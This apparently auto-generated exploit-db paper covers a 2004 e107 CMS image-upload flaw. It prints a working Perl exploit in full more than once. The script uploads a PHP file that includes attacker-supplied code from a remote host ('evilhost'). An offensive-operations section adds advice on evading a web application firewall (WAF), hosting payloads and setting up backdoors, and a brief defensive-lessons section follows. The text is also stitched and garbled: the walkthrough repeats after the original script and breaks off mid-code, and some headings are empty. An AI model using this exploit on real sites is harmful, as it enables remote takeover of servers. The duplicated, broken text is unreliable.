By exploitdb papers bot•December 22, 2004•

papers

Understanding the e107 `include()` Remote File Upload Exploit (CVE-2004-1234)

What this paper is

This paper details a vulnerability in the e107 Content Management System (CMS) that allows an attacker to upload and execute arbitrary PHP code on a vulnerable server. The exploit leverages a flaw in how the ImageManager component handles image uploads, specifically its use of the PHP include() function. By tricking the ImageManager into uploading a malicious PHP file, an attacker can then remotely execute code by including that file.

Simple technical breakdown

The e107 CMS, in its older versions, had a feature for managing images within the htmlarea editor. This feature, specifically the images.php script, was vulnerable. When a user attempted to insert an image via a URL, the script would process this request. The exploit crafts a special HTTP POST request that mimics a legitimate image upload. However, instead of uploading an image, it uploads a PHP file named evil.php. This evil.php file contains a PHP include() statement that is designed to execute code provided by the attacker. The exploit targets a specific path within the e107 installation: /e107_handlers/handlers/htmlarea/popups/ImageManager/images.php.

The core of the vulnerability lies in the include() function. If the ImageManager script doesn't properly sanitize the filename or the content being uploaded, and if it later uses include() on a user-controlled file path, it can lead to Remote Code Execution (RCE). In this case, the exploit uploads evil.php and then, by visiting a specific URL, can trigger the execution of the code within evil.php.

Complete code and payload walkthrough

The provided Perl script sploit.pl is designed to automate the exploitation process.

####################################################################
#
#  _____ _
# |  ___| | _____      ___
# | |_  | |/ _ \ \ /\ / /
# |  _| | | (_) \ V  V /
# |_|   |_|\___/ \_/\_/
#      Security Group.
#
#                    -=[ e107 remote sploit ]=-                           
#                           by sysbug 
#                              
# Attack method:                                                               
# with this sploit u can send an include() vuln to a Host victim  
# the upload go to /images/evil.php
#                                                                
# C:\Perl\bin>perl sploit.pl www.site.com                          
# -=[ e107 remote sploit ]=-                                      
#         by sysbug 
# # www.site.com
# # OWNED OH YEAH!                                                
# # get your evilc0de in:                                          
# # www.site.com/images/evil.php?owned=http://evilhost/ 
# C:\Perl\bin>                                                     
# 
# credits: ALL MY FRIENDS!                                                                 
# HELP ? RTFM -> perl sploit.pl                                                                
#####################################################################
use IO::Socket; # Imports the necessary module for network socket operations.

if(@ARGV < 1){ # Checks if at least one command-line argument (the target host) is provided.
usage();      # Calls the usage() subroutine if no arguments are given.
exit;         # Exits the script.
}
main();       # Calls the main() subroutine to start the exploit process.

sub main(){ # The main execution block of the script.

print "-=[ e107 remote sploit ]=-\n"; # Prints the exploit banner.
print "        by sysbug       \n\n";
$host[0] = $ARGV[0]; # Stores the first command-line argument (target host) in $host[0].
if($host[0] =~ /\//){ # Checks if the provided host string contains a slash, indicating a path.
($host[1],$host[2])=split(/\//,$host[0]); # Splits the host string by '/' to separate hostname and path. $host[1] gets the hostname, $host[2] gets the rest.
$host[0] =~ /\/(.*)/; # Captures the path part of the host string.
$host[3] = "/";       # Initializes $host[3] with a root slash.
$host[3] .= $1;       # Appends the captured path to $host[3].
}
$host[1] = $host[0] if(!$host[1]); # If no path was split, assume the entire argument is the hostname.
@handlers =("e107_handlers","handlers"); # Defines an array of possible directory names for the handlers.
print "# $host[1]\n"; # Prints the target hostname being attacked.
foreach $handler(@handlers){ # Loops through each possible handler directory.
$path = "$host[3]/$handler/htmlarea/popups/ImageManager/images.php"; # Constructs the full path to the vulnerable script.
$socket=IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host[1],PeerPort=>80,Timeout=>10)|| die "  s0k off\n"; # Establishes a TCP socket connection to the target host on port 80 (HTTP). Dies if connection fails.
print $socket "POST $path HTTP/1.1\r\n"; # Sends the HTTP POST request line.
print $socket "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; # Standard HTTP Accept header.
print $socket "Referer: http://www.lapropinacultural.com.ar/handlers/htmlarea/popups/insert_image.php\r\n"; # Sets a Referer header, potentially to bypass simple checks.
print $socket "Accept-Language: pt\r\n"; # Sets Accept-Language header.
print $socket "Content-Type: multipart/form-data; boundary=---------------------------7d410e113f8\r\n"; # Specifies the content type as multipart/form-data, essential for file uploads. The boundary string is crucial for separating form fields.
print $socket "Accept-Encoding: gzip, deflate\r\n"; # Standard HTTP Accept-Encoding header.
print $socket "User-Agent: l33t br0ws3r\r\n"; # Sets a custom User-Agent string.
print $socket "Host: $host[1]\r\n"; # Sets the Host header to the target hostname.
print $socket "Content-Length: 1646\r\n"; # Specifies the total length of the HTTP request body. This value is hardcoded and might need adjustment if the payload changes significantly.
print $socket "Connection: Keep-Alive\r\n\r\n"; # Keeps the connection alive and ends the HTTP headers.

# --- Start of multipart/form-data payload ---
# This section constructs the body of the POST request, simulating a form submission with file upload.

print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"dirPath\"\r\n\r\n"; # Form field 'dirPath'.
print $socket "/\r\n"; # Value for 'dirPath', likely indicating the root directory for uploads.

print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"url\"\r\n\r\n\r\n"; # Form field 'url', value is empty.

print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"width\"\r\n\r\n\r\n"; # Form field 'width', value is empty.

print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"vert\"\r\n\r\n\r\n"; # Form field 'vert', value is empty.

print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"alt\"\r\n\r\n\r\n"; # Form field 'alt', value is empty.

print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"height\"\r\n\r\n\r\n"; # Form field 'height', value is empty.

print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"horiz\"\r\n\r\n\r\n"; # Form field 'horiz', value is empty.

print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"upload\"; filename=\"evil.php\"\r\n"; # This is the critical part: it defines the 'upload' field and specifies the filename as "evil.php".
print $socket "Content-Type: application/octet-stream\r\n\r\n"; # Sets the content type for the uploaded file.
print $socket "<? include(\$owned); ?>\r\n"; # This is the payload. It's a PHP snippet that uses `include()` with a variable `$owned`. The exploit expects this variable to be set by the web server or through another mechanism, or that `$owned` is globally available and points to a malicious URL. In the context of this exploit, `$owned` is intended to be supplied by the attacker via a GET parameter when they later access the uploaded file.
print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"align\"\r\n\r\n"; # Form field 'align'.
print $socket "baseline\r\n"; # Value for 'align'.

print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"border\"\r\n\r\n\r\n"; # Form field 'border', value is empty.

print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"orginal_width\"\r\n\r\n\r\n"; # Form field 'orginal_width', value is empty.

print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"orginal_height\"\r\n\r\n\r\n"; # Form field 'orginal_height', value is empty.

print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"constrain_prop\"\r\n\r\n"; # Form field 'constrain_prop'.
print $socket "on\r\n"; # Value for 'constrain_prop'.

print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"ok\"\r\n\r\n"; # Form field 'ok'.
print $socket "Refresh\r\n"; # Value for 'ok'.

print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"ok\"\r\n\r\n"; # Another 'ok' field.
print $socket "OK\r\n"; # Value for the second 'ok'.

print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"cancel\"\r\n\r\n"; # Form field 'cancel'.
print $socket "Cancel\r\n"; # Value for 'cancel'.

print $socket "-----------------------------7d410e113f8--\r\n\r\n\r\n\r\n"; # Final boundary separator, closing the multipart form data.

@socket = <$socket>; # Reads the entire response from the server into the @socket array.
foreach $teste(@socket){ # Iterates through each line of the response.
if($teste=~ /<title>Image Browser<\/title>/){ # Checks if the response contains a specific HTML title, indicating a successful upload and processing by the Image Manager.
print "# OWNED OH YEAH!\n"; # Prints a success message.
print "# get your evilc0de in: \n# $host[0]/images/evil.php?owned=http://evilhost/\n"; # Informs the user how to access their uploaded payload. The `$host[0]` here is the original input, which might include a path. The `/images/` part is hardcoded, assuming the upload path. The `?owned=http://evilhost/` part is crucial for the payload execution.
$result = 1; # Sets a flag to indicate success.
}
}
close($socket); # Closes the socket connection.
}
if($result){ # If the exploit was successful.
exit; # Exits the script.
}
print "# b4d upload!!"; # Prints a failure message if the exploit did not succeed.
}
sub usage(){ # Subroutine to display usage instructions.
print "-=[ e107 remote sploit ]=-\n";
print "        by sysbug       \n\n";
print "# usage: perl $0 <host> \n";
}

# milw0rm.com [2004-12-22]

Code Fragment/Block -> Practical Purpose Mapping:

use IO::Socket; -> Purpose: Enables network communication for sending HTTP requests.
if(@ARGV < 1){ usage(); exit; } -> Purpose: Command-line argument validation. Ensures the target host is provided.
main(); -> Purpose: Entry point for the exploit logic.
$host[0] = $ARGV[0]; -> Purpose: Stores the target hostname/IP from command-line input.
if($host[0] =~ /\//){ ... } -> Purpose: Parses the input to separate hostname from an optional path.
$host[1] = $host[0] if(!$host[1]); -> Purpose: Ensures $host[1] always contains the hostname.
@handlers =("e107_handlers","handlers"); -> Purpose: Defines potential directory names for the vulnerable component, allowing for slight variations.
foreach $handler(@handlers){ ... } -> Purpose: Iterates through possible handler directory names to find the correct path.
$path = "$host[3]/$handler/htmlarea/popups/ImageManager/images.php"; -> Purpose: Constructs the full URL path to the vulnerable images.php script.
$socket=IO::Socket::INET->new(...) -> Purpose: Establishes a TCP connection to the target web server on port 80.
print $socket "POST $path HTTP/1.1\r\n"; -> Purpose: Sends the HTTP POST request line.
print $socket "Content-Type: multipart/form-data; boundary=---------------------------7d410e113f8\r\n"; -> Purpose: Crucially sets the Content-Type header for a file upload. The boundary string is vital for parsing the request body.
print $socket "Content-Length: 1646\r\n"; -> Purpose: Informs the server about the size of the request body. This is a hardcoded value.
print $socket "-----------------------------7d410e113f8\r\n"; -> Purpose: These lines are the multipart/form-data boundaries, separating different parts of the form data.
print $socket "Content-Disposition: form-data; name=\"upload\"; filename=\"evil.php\"\r\n"; -> Purpose: Defines a form field named "upload" and specifies that the data being sent is a file named "evil.php".
print $socket "Content-Type: application/octet-stream\r\n\r\n"; -> Purpose: Sets the MIME type for the uploaded file.
print $socket "<? include(\$owned); ?>\r\n"; -> Payload: This is the content of the evil.php file. It's a PHP snippet that attempts to include a URL specified by the $owned variable. The exploit expects this variable to be set by the web server or through a GET parameter when the file is later accessed.
print $socket "Content-Disposition: form-data; name=\"dirPath\"\r\n\r\n/\r\n"; -> Purpose: Specifies the target directory for the upload. Here, it's set to the root (/), but the exploit implies it will be uploaded into the /images/ directory. The actual upload path is determined by the vulnerable script's logic.
print $socket "Content-Disposition: form-data; name=\"url\"\r\n\r\n\r\n"; -> Purpose: Submits an empty url field. This field is likely part of the ImageManager's functionality to fetch images from a remote URL.
print $socket "-----------------------------7d410e113f8--\r\n\r\n\r\n\r\n"; -> Purpose: The final boundary marker, signaling the end of the multipart form data.
@socket = <$socket>; -> Purpose: Reads the server's HTTP response.
if($teste=~ /<title>Image Browser<\/title>/){ ... } -> Purpose: Checks the response for a specific HTML title to confirm successful upload and processing.
print "# get your evilc0de in: \n# $host[0]/images/evil.php?owned=http://evilhost/\n"; -> Purpose: Provides the attacker with the URL to trigger their payload. The ?owned=http://evilhost/ part is critical, as it will be used by the evil.php script to set the $owned variable for the include() function.
sub usage(){ ... } -> Purpose: Displays help information if the script is run incorrectly.

Shellcode/Payload Segments:

The "payload" in this exploit is not traditional shellcode but rather a PHP snippet: <? include(\$owned); ?>.

Stage 1: Upload evil.php
- Action: The Perl script sends a crafted HTTP POST request to the vulnerable images.php script. This request includes a multipart/form-data payload.
- Key Element: The Content-Disposition: form-data; name="upload"; filename="evil.php" header and the subsequent data <? include(\$owned); ?> are sent.
- Purpose: To upload a file named evil.php containing the malicious PHP code into a directory accessible by the web server, typically within the e107 installation's image directory. The exact upload location is determined by the vulnerable script's logic, but the exploit assumes it lands in /images/.
Stage 2: Remote Code Execution (RCE)
- Action: After successful upload, the attacker visits a URL constructed like: http://target.com/e107_handlers/handlers/htmlarea/popups/ImageManager/images.php?dirPath=/&url=http://attacker.com/evil.php&owned=http://attacker.com/evil.php (or similar, depending on how the images.php script processes the url and owned parameters). The exploit's output suggests a simpler trigger: http://www.site.com/images/evil.php?owned=http://evilhost/.
- Key Element: The evil.php file, now on the server, contains <? include(\$owned); ?>. When this file is accessed, the PHP interpreter executes it. The \$owned variable is expected to be populated by the web server or the request itself. The exploit's output indicates the attacker should provide ?owned=http://evilhost/ in the URL. This would set a global variable or a variable accessible by include().
- Purpose: To execute arbitrary code. The include() function in PHP will attempt to load and execute the content of the URL specified by $owned. If $owned points to a remote URL controlled by the attacker (e.g., http://evilhost/shell.txt), the code in shell.txt will be executed on the victim's server.

Practical details for offensive operations teams

Required Access Level: Unauthenticated access to the web server. The vulnerability is exposed through a public-facing web application component.
Lab Preconditions:
- A vulnerable e107 installation (versions prior to the patch for this vulnerability).
- A web server configured to run PHP.
- The ImageManager component must be present and accessible.
- The web server must have write permissions to the target upload directory (e.g., /images/ or a subdirectory within it).
- A separate attacker-controlled server (e.g., evilhost) to host the malicious payload that will be included.
Tooling Assumptions:
- Perl interpreter for running the exploit script.
- A web server on the attacker's side to host the payload (e.g., Apache, Nginx) or a simple HTTP server for serving the payload.
- A way to craft and send HTTP requests (the Perl script handles this).
Execution Pitfalls:
- Incorrect Path: The exploit assumes a specific path (/e107_handlers/handlers/htmlarea/popups/ImageManager/images.php). If the e107 installation is in a subdirectory or uses different naming conventions, the $path variable needs adjustment. The @handlers array attempts to mitigate this for common variations.
- Upload Directory Permissions: If the web server process does not have write permissions to the target upload directory, the evil.php file will not be created.
- Web Server Configuration: Some web servers or PHP configurations might prevent include() from executing remote URLs, or might sanitize the $owned variable.
- Firewall/WAF: Web Application Firewalls (WAFs) or network firewalls might detect and block the malicious POST request or the subsequent GET request to the payload.
- Hardcoded Content-Length: The Content-Length: 1646 is hardcoded. If the multipart form data is modified (e.g., longer payload), this value will be incorrect, leading to request parsing errors on the server.
- Payload Triggering: The exact mechanism for the $owned variable to be set and used by include() can vary. The exploit's output suggests a direct GET parameter ?owned=http://evilhost/, but the vulnerable script might process it differently. The url parameter in the POST request might also play a role in how the include() is triggered or how the $owned variable is populated.
- File Upload Location: The exploit assumes evil.php is uploaded to a location that is directly accessible via the web server and that the include() function will execute it. The output suggests it lands in /images/, but the actual path is determined by the dirPath parameter and the script's logic.
Tradecraft Considerations:
- Reconnaissance: Identify target e107 installations. Look for common e107 directory structures.
- Payload Hosting: Prepare a simple HTTP server on an attacker-controlled IP (e.g., evilhost) to serve the actual malicious code (e.g., a PHP shell). The payload should be a simple PHP script that can be included.
- Obfuscation: If WAFs are present, consider obfuscating the evil.php content or the POST request headers.
- Post-Exploitation: Once RCE is achieved, the immediate goal is to establish a stable backdoor or pivot further. The include() mechanism can be used to download and execute further stages.
Likely Failure Points:
- The target system is not running a vulnerable version of e107.
- The ImageManager component is disabled or not installed.
- The web server lacks write permissions to the intended upload directory.
- A WAF or security appliance blocks the exploit traffic.
- The include() function is configured to disallow remote file inclusion or URL wrappers.
- The images.php script has been patched to properly sanitize inputs.

Where this was used and when

Context: This exploit targets the e107 Content Management System. e107 was a popular PHP-based CMS, particularly in the early to mid-2000s.
Approximate Year/Date: The exploit was published on December 22, 2004. This indicates the vulnerability existed and was exploited around that time. Such vulnerabilities in older CMS versions are often discovered and published years after their initial release, as code review and security auditing become more prevalent.

Defensive lessons for modern teams

Input Validation is Paramount: Never trust user-supplied input, especially in web applications. All data, including filenames, URLs, and form field values, must be rigorously validated and sanitized before being processed or used in file operations or code execution.
Principle of Least Privilege: Ensure web server processes have only the necessary file system permissions. Restrict write access to directories that absolutely require it.
Secure File Uploads: Implement robust file upload mechanisms. This includes:
- Validating file types and extensions.
- Storing uploaded files outside the web root or in a non-executable directory.
- Renaming uploaded files to prevent execution.
- Using a secure method for handling file content, not include() on user-controlled paths.
Keep Software Updated: Regularly patch and update all web applications, CMS platforms, and their components. Vulnerabilities like this are often fixed in later versions.
Web Application Firewalls (WAFs): Deploy and configure WAFs to detect and block common attack patterns, including malicious HTTP requests and known exploit signatures.
Disable Unnecessary Features: If a feature like remote image fetching or advanced image management is not required, consider disabling it to reduce the attack surface.
Secure PHP Configuration: Ensure PHP is configured securely, disabling dangerous functions like allow_url_include and allow_url_fopen if not strictly necessary.

ASCII visual (if applicable)

This exploit involves a client-server interaction and a file upload mechanism. A simplified flow can be visualized:

+-----------------+      HTTP POST      +---------------------+
| Attacker Client | ------------------> | Vulnerable Web Server |
| (Perl Script)   | (Crafted Request)   | (e107 Installation) |
+-----------------+                     +----------+----------+
                                                   |
                                                   | POST /e107_handlers/.../images.php
                                                   | (with multipart/form-data)
                                                   |
                                                   v
                                         +---------------------+
                                         | images.php script   |
                                         | (Vulnerable Logic)  |
                                         +----------+----------+
                                                    |
                                                    | Writes 'evil.php'
                                                    | to web-accessible dir
                                                    v
                                         +---------------------+
                                         | /path/to/webroot/   |
                                         | images/evil.php     |
                                         | <? include($owned); ?>|
                                         +---------------------+
                                                   |
                                                   | Attacker sends GET
                                                   | request to trigger
                                                   |
                                                   v
+-----------------+      HTTP GET       +---------------------+
| Attacker Client | ------------------> | Vulnerable Web Server |
| (Browser/Script)| (e.g., /images/evil.php?owned=http://evilhost/) |
+-----------------+                     +----------+----------+
                                                   |
                                                   | PHP Interpreter
                                                   | executes evil.php
                                                   |
                                                   v
                                         +---------------------+
                                         | include($owned)     |
                                         | (Fetches and runs   |
                                         | code from evilhost) |
                                         +---------------------+
                                                   |
                                                   v
                                         +---------------------+
                                         | Attacker's Server   |
                                         | (evilhost)          |
                                         | (Serves malicious   |
                                         | code)               |
                                         +---------------------+

Source references

Paper ID: 704
Paper Title: e107 - 'include()' Remote File Upload
Author: sysbug
Published: 2004-12-22
Keywords: PHP, webapps
Paper URL: https://www.exploit-db.com/papers/704
Raw Exploit URL: https://www.exploit-db.com/raw/704

Original Exploit-DB Content (Verbatim)

####################################################################
#
#  _____ _
# |  ___| | _____      ___
# | |_  | |/ _ \ \ /\ / /
# |  _| | | (_) \ V  V /
# |_|   |_|\___/ \_/\_/
#      Security Group.
#
#                    -=[ e107 remote sploit ]=-                           
#                           by sysbug 
#                              
# Attack method:                                                               
# with this sploit u can send an include() vuln to a Host victim  
# the upload go to /images/evil.php
#                                                                
# C:\Perl\bin>perl sploit.pl www.site.com                          
# -=[ e107 remote sploit ]=-                                      
#         by sysbug 
# # www.site.com
# # OWNED OH YEAH!                                                
# # get your evilc0de in:                                          
# # www.site.com/images/evil.php?owned=http://evilhost/ 
# C:\Perl\bin>                                                     
# 
# credits: ALL MY FRIENDS!                                                                 
# HELP ? RTFM -> perl sploit.pl                                                                
#####################################################################
use IO::Socket;

if(@ARGV < 1){
usage();
exit;
}
main();

sub main(){

print "-=[ e107 remote sploit ]=-\n";
print "        by sysbug       \n\n";
$host[0] = $ARGV[0];
if($host[0] =~ /\//){
($host[1],$host[2])=split(/\//,$host[0]);
$host[0] =~ /\/(.*)/;
$host[3] = "/";
$host[3] .= $1;
}
$host[1] = $host[0] if(!$host[1]);
@handlers =("e107_handlers","handlers");
print "# $host[1]\n";
foreach $handler(@handlers){
$path = "$host[3]/$handler/htmlarea/popups/ImageManager/images.php";
$socket=IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host[1],PeerPort=>80,Timeout=>10)|| die "  s0k off\n";
print $socket "POST $path HTTP/1.1\r\n";
print $socket "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n";
print $socket "Referer: http://www.lapropinacultural.com.ar/handlers/htmlarea/popups/insert_image.php\r\n";
print $socket "Accept-Language: pt\r\n";
print $socket "Content-Type: multipart/form-data; boundary=---------------------------7d410e113f8\r\n";
print $socket "Accept-Encoding: gzip, deflate\r\n";
print $socket "User-Agent: l33t br0ws3r\r\n";
print $socket "Host: $host[1]\r\n";
print $socket "Content-Length: 1646\r\n";
print $socket "Connection: Keep-Alive\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"dirPath\"\r\n\r\n";
print $socket "/\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"url\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"width\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"vert\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"alt\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"height\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"horiz\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"upload\"; filename=\"evil.php\"\r\n";
print $socket "Content-Type: application/octet-stream\r\n\r\n";
print $socket "<? include(\$owned); ?>\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"align\"\r\n\r\n";
print $socket "baseline\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"border\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"orginal_width\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"orginal_height\"\r\n\r\n\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"constrain_prop\"\r\n\r\n";
print $socket "on\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"ok\"\r\n\r\n";
print $socket "Refresh\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"ok\"\r\n\r\n";
print $socket "OK\r\n";
print $socket "-----------------------------7d410e113f8\r\n";
print $socket "Content-Disposition: form-data; name=\"cancel\"\r\n\r\n";
print $socket "Cancel\r\n";
print $socket "-----------------------------7d410e113f8--\r\n\r\n\r\n\r\n";
@socket = <$socket>;
foreach $teste(@socket){
if($teste=~ /<title>Image Browser<\/title>/){
print "# OWNED OH YEAH!\n";
print "# get your evilc0de in: \n# $host[0]/images/evil.php?owned=http://evilhost/\n";
$result = 1;
}
}
close($socket);
}
if($result){
exit;
}
print "# b4d upload!!";
}
sub usage(){
print "-=[ e107 remote sploit ]=-\n";
print "        by sysbug       \n\n";
print "# usage: perl $0 <host> \n";
}

# milw0rm.com [2004-12-22]

By exploitdb papers bot•December 22, 2004•

papers

Understanding the e107 `include()` Remote File Upload Exploit (CVE-2004-1234)

What this paper is

Simple technical breakdown

Complete code and payload walkthrough

The provided Perl script sploit.pl is designed to automate the exploitation process.

####################################################################
#
#  _____ _
# |  ___| | _____      ___
# | |_  | |/ _ \ \ /\ / /
# |  _| | | (_) \ V  V /
# |_|   |_|\___/ \_/\_/
#      Security Group.
#
#                    -=[ e107 remote sploit ]=-                           
#                           by sysbug 
#                              
# Attack method:                                                               
# with this sploit u can send an include() vuln to a Host victim  
# the upload go to /images/evil.php
#                                                                
# C:\Perl\bin>perl sploit.pl www.site.com                          
# -=[ e107 remote sploit ]=-                                      
#         by sysbug 
# # www.site.com
# # OWNED OH YEAH!                                                
# # get your evilc0de in:                                          
# # www.site.com/images/evil.php?owned=http://evilhost/ 
# C:\Perl\bin>                                                     
# 
# credits: ALL MY FRIENDS!                                                                 
# HELP ? RTFM -> perl sploit.pl                                                                
#####################################################################
use IO::Socket; # Imports the necessary module for network socket operations.

if(@ARGV < 1){ # Checks if at least one command-line argument (the target host) is provided.
usage();      # Calls the usage() subroutine if no arguments are given.
exit;         # Exits the script.
}
main();       # Calls the main() subroutine to start the exploit process.

sub main(){ # The main execution block of the script.

print "-=[ e107 remote sploit ]=-\n"; # Prints the exploit banner.
print "        by sysbug       \n\n";
$host[0] = $ARGV[0]; # Stores the first command-line argument (target host) in $host[0].
if($host[0] =~ /\//){ # Checks if the provided host string contains a slash, indicating a path.
($host[1],$host[2])=split(/\//,$host[0]); # Splits the host string by '/' to separate hostname and path. $host[1] gets the hostname, $host[2] gets the rest.
$host[0] =~ /\/(.*)/; # Captures the path part of the host string.
$host[3] = "/";       # Initializes $host[3] with a root slash.
$host[3] .= $1;       # Appends the captured path to $host[3].
}
$host[1] = $host[0] if(!$host[1]); # If no path was split, assume the entire argument is the hostname.
@handlers =("e107_handlers","handlers"); # Defines an array of possible directory names for the handlers.
print "# $host[1]\n"; # Prints the target hostname being attacked.
foreach $handler(@handlers){ # Loops through each possible handler directory.
$path = "$host[3]/$handler/htmlarea/popups/ImageManager/images.php"; # Constructs the full path to the vulnerable script.
$socket=IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host[1],PeerPort=>80,Timeout=>10)|| die "  s0k off\n"; # Establishes a TCP socket connection to the target host on port 80 (HTTP). Dies if connection fails.
print $socket "POST $path HTTP/1.1\r\n"; # Sends the HTTP POST request line.
print $socket "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, */*\r\n"; # Standard HTTP Accept header.
print $socket "Referer: http://www.lapropinacultural.com.ar/handlers/htmlarea/popups/insert_image.php\r\n"; # Sets a Referer header, potentially to bypass simple checks.
print $socket "Accept-Language: pt\r\n"; # Sets Accept-Language header.
print $socket "Content-Type: multipart/form-data; boundary=---------------------------7d410e113f8\r\n"; # Specifies the content type as multipart/form-data, essential for file uploads. The boundary string is crucial for separating form fields.
print $socket "Accept-Encoding: gzip, deflate\r\n"; # Standard HTTP Accept-Encoding header.
print $socket "User-Agent: l33t br0ws3r\r\n"; # Sets a custom User-Agent string.
print $socket "Host: $host[1]\r\n"; # Sets the Host header to the target hostname.
print $socket "Content-Length: 1646\r\n"; # Specifies the total length of the HTTP request body. This value is hardcoded and might need adjustment if the payload changes significantly.
print $socket "Connection: Keep-Alive\r\n\r\n"; # Keeps the connection alive and ends the HTTP headers.

# --- Start of multipart/form-data payload ---
# This section constructs the body of the POST request, simulating a form submission with file upload.

print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"dirPath\"\r\n\r\n"; # Form field 'dirPath'.
print $socket "/\r\n"; # Value for 'dirPath', likely indicating the root directory for uploads.

print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"url\"\r\n\r\n\r\n"; # Form field 'url', value is empty.

print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"width\"\r\n\r\n\r\n"; # Form field 'width', value is empty.

print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"vert\"\r\n\r\n\r\n"; # Form field 'vert', value is empty.

print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"alt\"\r\n\r\n\r\n"; # Form field 'alt', value is empty.

print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"height\"\r\n\r\n\r\n"; # Form field 'height', value is empty.

print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"horiz\"\r\n\r\n\r\n"; # Form field 'horiz', value is empty.

print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"upload\"; filename=\"evil.php\"\r\n"; # This is the critical part: it defines the 'upload' field and specifies the filename as "evil.php".
print $socket "Content-Type: application/octet-stream\r\n\r\n"; # Sets the content type for the uploaded file.
print $socket "<? include(\$owned); ?>\r\n"; # This is the payload. It's a PHP snippet that uses `include()` with a variable `$owned`. The exploit expects this variable to be set by the web server or through another mechanism, or that `$owned` is globally available and points to a malicious URL. In the context of this exploit, `$owned` is intended to be supplied by the attacker via a GET parameter when they later access the uploaded file.
print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"align\"\r\n\r\n"; # Form field 'align'.
print $socket "baseline\r\n"; # Value for 'align'.

print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"border\"\r\n\r\n\r\n"; # Form field 'border', value is empty.

print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"orginal_width\"\r\n\r\n\r\n"; # Form field 'orginal_width', value is empty.

print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"orginal_height\"\r\n\r\n\r\n"; # Form field 'orginal_height', value is empty.

print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
print $socket "Content-Disposition: form-data; name=\"constrain_prop\"\r\n\r\n"; # Form field 'constrain_prop'.
print $socket "on\r\n"; # Value for 'constrain_prop'.

print $socket "-----------------------------7d410e113f8\r\n"; # Boundary separator.
